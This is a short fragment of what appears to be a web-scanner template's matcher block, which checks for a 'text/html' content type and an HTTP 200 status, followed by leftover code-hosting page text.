words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue